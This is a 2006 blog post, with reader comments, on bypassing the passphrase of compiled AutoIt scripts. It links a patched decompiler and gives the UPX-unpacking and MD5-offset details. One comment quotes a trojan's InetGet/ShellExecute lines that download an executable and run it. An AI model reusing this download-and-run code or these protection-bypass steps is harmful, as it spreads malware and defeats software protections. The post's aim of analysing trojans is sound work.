Yet Another Update for AutoIT cracking

13 09 2006

UPDATE: New link for the file below: http://www.monkey-tech.com/files/AutoIt%203-Dec.zip

I’ve been hopelessly trying to figure out how to bypass the pass-phrase for AutoIT v. 3.2.0.1. One of our readers Daniel kindly posted a link to ANITWPA (http://antiwpa.org.ru/), where they already did this. I downloaded the “improved” decompiler and it worked great. Here’s link to one of their mirrors (I couldn’t get to the original site):

http://www.thisispain.com/antiwpa/Others/tmp/AutoIt%203-Decompiler%20CW2K-Edition%20+%20Improved%20Version.zip

Basically, they bypass the passphrase altogether. I managed to get to the point in OllyDbg (great tool, BTW, I’ll post some OllyDbg things I recently learned soon) where I found out that:

  • The passphrase used for “encrypting” is stored in the file as an MD5 hash.
  • The resulting .exe file is UPXed.
  • To find the MD5, first use the upx.exe provided by autoit (\autoit-v3.2.0.1\Aut2Exe\upx.exe) to decompress the .exe:
    • Open a command prompt and use upx.exe with the “-d” switch:
    • EXAMPLE: upx -d mytestfile.exe
    • More about UPX can be found here: http://en.wikipedia.org/wiki/UPX
  • This will decompress “mytestfile.exe” – it almost doubles in size.
  • The MD5 hash of the passphrase is found at offset 0x0005d618 in the decompressed file (you can use hiew or any binary file viewer – even OllyDbg!).
  • When you run the exe2aut to “decrypt” the file, it will take the passphrase you enter and convert it to MD5. There is also some XORing going on. This is where I’m weak right now.
  • At some point, it will open the EXE and do…something. This is where I was stuck.

I’ll examine the AutoIt3-Decompiler from CW2K to see if I can learn anything from them. If anyone has info on how they did it, please post a comment. From what I can see, it seems like they just “patched” the original AutoIT decompiler, probably to skip the whole checking of passphrases or fill in the MD5 passphrase from the one in the file.

Why am I doing this? Why do I care? Two reasons:

  1. To emphasise that people should NOT store passwords or sensitive information in their AutoIT scripts.
  2. To quote from the readme file in the “improved” decompiler above:

Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.

 

Advertisements

Actions

Information

25 responses

15 09 2006
identical

“Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.“

That’s right. Lots of these so-called AutoIt trojans are being spreading among our community. Using the above tool, I had the ability to decompile them all to see how they affected my system.

Thanks very much for your great posts. Keep up your good work!

3 10 2006
Ion

The zip file is not on that url, can you please upload it somewhere?

15 10 2006
Marco

Nowadays autoitscripts can be obfuscated. So even if you can decompile, you will not be able to read the code you just decompiled.

http://www.autoitscript.com/forum/index.php?showtopic=32171&pid=231190&st=0&#

30 12 2006
stooge

this site may help you then… http://www.openrce.org/forums/posts/178

2 04 2007
CiPH3R

Here is a working mirror for the “Improved” version:
“http://t-line.net.ua/antiwpa/Other/tmp/”.

Enjoy!

29 05 2007
Randy

it doesnt seem to work for me anymore on newly made scripts -.-‘

27 06 2007
SoFtMoDs

Has anyone shed any new light on this subject, I have an autoit 3.2.2.0 that I have been trying to get the original script from the current exe file. I have tried the tutorial at OpenRCE and it does not seem to work.

TIA

18 07 2007
cw2k

I completely Reverse Engineered the office AutoIt3 Decompiler and made it
Open source. See

->myAutToExe1_51_src.zip
http://nfo.host.sk/antiwpa/Other/tmp/

* can also decompile ‘Auto Hot Key Scripts’ (AHK – is some spin off project from Autoit it)
Also I added ‘support’ for some common Obfuscator like ‘van Zande’ (the one from the autoit download page) and Encode it.

For historical reason and for ppl from the east (China, Japan… ) how have DBCS (Double Binary Char Set) enable on they windows myAutToExe currently don’t come alon with there is also the ‘Exe2Aut-CW2K-Edition2.exe’ which now also supports unicode scripts.

->AutoIt 3-Decompiler CW2K-Edition2 + Improved Version.zip
http://nfo.host.sk/antiwpa/Other/tmp/

Relate Forum Link
http://maghia.free.fr/Board/viewtopic.php?t=234

1 08 2007
bolero

Has anyone has autoIt 3-Decompiler CW2K-Edition2 + Improved Version.zip? The site is die and i cannot download

9 08 2007
philiber

another mirror site ?
best regards

7 09 2007
suspicious script user

AutoIt 3.2.6.0 and higher compiles to bytecode. Makes checking scripts for backdoors harder… 😦
Will anyone care to write a decompiler?

12 10 2007
jacks

thanks for the info guys, i got a autoit progarm that i realy needed but it had a trojan, with the decompiler i got on one of the urls i could remove the trojan form the script and rebuilt it =D

look what was in the script
InetGet(“http://www.xxxxxxx/hosts.exe”, “C:\WINDOWS\hosts.exe”,1)
Sleep(40000)
ShellExecute(“hosts.exe”,”C:\WINDOWS\”)

i removed that and rebult the script and now im happy =D
thanks again

11 12 2007
piyush chandra

hello
thank u for the great information.
i have one AutoIt Decompile (along with some latest version of AtoIt3, i d’loaded)
Just got interested in AutoIt after i decompiled a nasty Trojan.. 🙂

The links that u have mentioned here are no longer available, i need some decompiler that “bypass the passphrase”… plz help me.
got to decompile a few more Trojans.. 😉

27 03 2009
MailerMan

Hey If you guys came through any AutoIT written viruses split them into a lot of pieses(use a simple spitter) zip all the files and mail it to me at mario_thilanga@yahoo.com i thnk i will then try my best to programe a cure to those viruses and mail it to who ever you are.Try me may be youl find a help.Dnt wory im not a spammer.i jst wont ot help!!!

27 03 2009
MailerMan

Bt remember it will take a little bit of time 🙂

23 05 2009
bedsfleedyfekuolpe

trytr565yuo890bvnmbnkiuoiuo4r56y

29 07 2009
dami

I got this bot that has a password on it – does anyone have a current way to break the encryption and decompile an exe?

All the old links are dead.. Please help 🙂

13 10 2010
sofiyavterano

ростов объявления о знакомстве тула форум знакомств сайт знакомств г кызыл секс знакомства г ногинска знакомства бисексуалы сосновый бор секс знакомства знакомства лав усинск
bestr of dati

3 12 2011
bestelkado-1

Hi there! Do you know if they make any plugins to help with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains. If you know of any please share. Thanks!

5 09 2012
s

hi………how can I debug an autoit file using Olly debug?……

18 03 2013
privatkredite füR selbstständige

Cool blog! Is your theme custom made or did you download it from somewhere?
A theme like yours with a few simple tweeks would really make my blog shine.
Please let me know where you got your theme.
Thanks a lot

6 05 2013
how to get a Loan with bad credit

There’s certainly a great deal to find out about this issue. I really like all of the points you made.

11 05 2013
what is clickbank marketplace

I’ve been attending around for the optimal website to acquire one particular.:)

22 05 2013
wechsel von gesetzliche in private krankenversicherung

I normally usually do not respond to messages, but on this matter.
WoW:)

30 11 2013
ミネトンカ ローファー

カシオ カタログ ミネトンカ ローファー http://chuanqisfq.onlinecentigrade2013.com/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: